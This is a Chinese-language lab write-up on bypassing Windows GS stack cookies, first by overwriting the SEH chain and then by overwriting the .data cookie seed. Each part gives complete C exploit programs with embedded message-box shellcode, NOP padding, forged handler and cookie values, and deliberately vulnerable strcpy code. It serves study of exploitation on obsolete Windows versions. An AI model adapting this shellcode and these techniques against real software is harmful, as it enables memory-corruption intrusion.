OD: GS Bypasing via SEH / .data

通过 SEH 绕过 GS 保护

GS 机制没对 SEH 提供保护，所以可心通过攻击异常来绕过 GS。

实验环境为：
VMware : Windows 2000 sp4, 此版本无 SafeSEH 的影响
Visual Studio 2005
    Project Properties : Release, Disable Optimization

代码如下：

 1 #include <string.h>
 2 char shellcode[]=
 3 "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
 4 "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
 5 "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
 6 "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
 7 "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
 8 "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
 9 "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
10 "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
11 "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
12 "x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50"
13 "x53xFFx57xFCx53xFFx57xF8"      // 168 字节的弹窗 shellcode
14 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
15 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
16 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
17 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
18 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
19 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
20 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
21 "x90x90x90x90"  // 116 字节的 nop,  168 + 116 = 284
22 "x90x90x90x90"  // seh chain
23 "x94xFEx12x00"  // seh handler
24 ;
25 void test(char * input)
26 {
27     char buf[200];
28     strcpy(buf,input);
29     strcat(buf,input);    // destroy stack frame & throw exception
30 }
31 void main()
32 {
33     test(shellcode);
34 }

函数 test() 存在典型溢出漏洞，line 28 处的 strcpy 会溢出 buf[]，当 char* input 足够长时 SEH 链表会被覆盖；line 29 处的 strcat() 会破坏栈帧，触发异常。

shellcode 的长度要事先通过 OllyDbg 调试确定。实验中 SEH Chain 的第一个节点距离栈帧中 buf 的距离为 284，line 22-23 覆盖 SEH 第一节点。

通过改变 .data 种子绕过 GS

实验环境为：
VMware : Windows XP sp3
Visual Studio 2008
    Project Properties : Release, Disable Optimization

代码如下：

 1 #include "stdafx.h"
 2 #include <stdlib.h>
 3 #include <string.h>
 4 char shellcode[]=
 5 "x90x90x90x90"        // new value of security cookie in .data
 6 "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
 7 "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
 8 "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
 9 "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
10 "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
11 "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
12 "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
13 "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
14 "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
15 "x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50"
16 "x53xFFx57xFCx53xFFx57xF8" // 168 bytes pop-window shellcode
17 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
18 "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
19 "xF4x6Fx82x90"        // result of x90 * 4 xor EBP, GS cookie
20 "x90x90x90x90"        // ebp
21 "x18x30x40x00"        // address of shellcode, return address
22 ;
23 void test(char *dst, int i, char *src)
24 {
25     char buf[200];
26     if(i<0x9995)          // 当传入的 i 为负时也能通过 if 测试
27     {
28         char *p=dst+i;    // 控制 i 的值，使 p 指向 .data 中的 cookie 种子
29         *p=*src;
30         *(p+1)=*(src+1);
31         *(p+2)=*(src+2);
32         *(p+3)=*(src+3);
33     }
34     strcpy(buf,src);      // 覆盖溢出
35 }
36 void main()
37 {
38     char *str=(char*)malloc(0x10000);
39     test(str,0x00403000-(int)str,shellcode);
40 }